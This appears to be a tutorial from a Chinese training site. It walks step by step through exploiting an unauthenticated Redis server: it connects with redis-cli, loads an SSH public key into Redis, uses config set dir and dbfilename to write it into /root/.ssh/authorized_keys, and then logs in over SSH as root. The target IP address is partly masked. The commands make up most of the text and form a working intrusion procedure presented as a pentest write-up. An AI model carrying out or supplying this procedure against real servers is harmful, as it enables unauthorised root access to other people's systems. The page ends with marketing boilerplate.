千锋教育-做有情怀、有良心、有品质的职业教育机构

手机站
千锋教育

千锋学习站 | 随时随地免费学

千锋教育

扫一扫进入千锋手机站

领取全套视频
千锋教育

关注千锋学习站小程序
随时随地免费学习课程

当前位置:首页  >  技术干货  > redis未授权访问配合ssh免密登录getshell

redis未授权访问配合ssh免密登录getshell

来源:千锋教育
发布人:wjy
时间: 2022-09-08 13:55:02 1662616502

  在一次渗透测试中拿到一个ip地址52.80.249.xx,nmap端口扫描出22,6379,80端口,目标机是linux系统的一台服务器,6379为redis的默认端口,尝试对其进行利用。使用kali作为攻击机

  一、环境准备

  1.1、在攻击机上面下载redis

  wget http://download.redis.io/releases/redis-2.8.17.tar.gz

redis未授权访问配合ssh免密登录getshell1

  1.2解压文件,执行文件

  解压文件:

  tar xzf redis-2.8.17.tar.gz

  进入redis目录:

  cd redis-2.8.17

  安装:make

redis未授权访问配合ssh免密登录getshell2

  1.3、进入src目录,将redis-server和redis-cli拷贝到/usr/bin目录下(这样以后启动redis就不用进入安装目录了)

  cd src

  cp redis-server /usr/bin

  cp redis-cli /usr/bin

redis未授权访问配合ssh免密登录getshell3

  1.4、返回目录redis-2.8.17,将redis.conf拷贝到/etc/目录下

  cd ../

  cp redis.conf /etc/

redis未授权访问配合ssh免密登录getshell4

  1.5、使用/etc/目录下的reids.conf文件中的配置启动redis服务:

  redis-server /etc/redis.conf

redis未授权访问配合ssh免密登录getshell5

  1.6、然后ctrl+c退出,再次进入src目录然后连接目标靶机的redis服务

  ctrl+c

  cd src

  redis-cli –h 52.80.249.xx

redis未授权访问配合ssh免密登录getshell6

  出现52.80.249.xx:6379>就代表连接成功,并且没有输入密码

  二、漏洞利用

  2.1、这里附上一个这里没法利用的一种 攻击方式截图(没有测试仅供参考)

redis未授权访问配合ssh免密登录getshell7

  2.2、我们这里是不知道路径的,根据前期信息收集知道还有ssh服务的22端口是开放的,可以利用“公私钥”认证获取root权限

  使用ssh生成公钥和私钥文件

  ssh-keygen -t rsa

redis未授权访问配合ssh免密登录getshell8

  2.3、进入.ssh文件下,将上面生成的公钥保存到1.txt里面

  cd /root/.ssh

  (echo -e "\n\n";cat id_rsa.pub; echo -e "\n\n") > 1.txt

redis未授权访问配合ssh免密登录getshell9

  2.4、将生成的公钥文件通过redis上传到目标服务器

  cat 1.txt | redis-cli -h 52.80.249.xx -x set crack

redis未授权访问配合ssh免密登录getshell10

  2.5、远程连接redis服务

  redis-cli -h 52.80.249.xx

redis未授权访问配合ssh免密登录getshell11

  2.6、获得redis备份的路径

  config get dir

redis未授权访问配合ssh免密登录getshell12

  2.7、更改redis备份路径为ssh公钥存放目录(一般默认为/root/.ssh):

redis未授权访问配合ssh免密登录getshell13

  2.8、设置上传公钥的备份文件名字为authorized_keys:

  config set dbfilename authorized_keys

redis未授权访问配合ssh免密登录getshell14

  2.9、检查是否更改成功(查看有没有authorized_keys文件),没有问题就保存然后退出,至此成功写入ssh公钥到靶机

  config get dbfilename

redis未授权访问配合ssh免密登录getshell15

  2.10、攻击机直接ssh连接目标服务器

  ssh -i id_rsa root@52.80.249.xx

redis未授权访问配合ssh免密登录getshell16

tags:
声明:本站稿件版权均属千锋教育所有,未经许可不得擅自转载。
10年以上业内强师集结,手把手带你蜕变精英
请您保持通讯畅通,专属学习老师24小时内将与您1V1沟通
免费领取
今日已有369人领取成功
刘同学 138****2860 刚刚成功领取
王同学 131****2015 刚刚成功领取
张同学 133****4652 刚刚成功领取
李同学 135****8607 刚刚成功领取
杨同学 132****5667 刚刚成功领取
岳同学 134****6652 刚刚成功领取
梁同学 157****2950 刚刚成功领取
刘同学 189****1015 刚刚成功领取
张同学 155****4678 刚刚成功领取
邹同学 139****2907 刚刚成功领取
董同学 138****2867 刚刚成功领取
周同学 136****3602 刚刚成功领取
相关推荐HOT